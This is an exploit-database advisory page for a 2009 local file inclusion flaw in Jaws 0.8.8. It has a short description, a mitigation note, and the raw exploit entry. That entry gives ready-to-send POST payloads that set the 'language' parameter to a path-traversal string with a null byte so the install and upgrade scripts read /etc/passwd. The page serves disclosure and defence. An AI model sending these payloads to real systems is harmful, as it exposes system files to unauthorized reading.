header-logo
Suggest Exploit
vendor:
Jaws
by:
milw0rm.com
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Jaws
Affected Version From: 2000.8.8
Affected Version To: 2000.8.8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Jaws 0.8.8 Local File Inclusion

Jaws 0.8.8 is vulnerable to Local File Inclusion (LFI) when an attacker sends a specially crafted HTTP POST request to the vulnerable application. The vulnerable parameters are ‘language’ in the ‘/upgrade/index.php’ and ‘/install/index.php’ scripts. An attacker can exploit this vulnerability by sending a malicious HTTP POST request with the ‘language’ parameter set to a file path such as ‘../../../../../../../../../../../../etc/passwd%00’. This will cause the application to include the contents of the ‘/etc/passwd’ file in the response. Additionally, the ‘Introduction_complete’ and ‘use_log’ scripts are also vulnerable to this attack.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

Jaws 0.8.8 Local File Inclusion

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log

Author notified: Jan 24

# milw0rm.com [2009-02-04]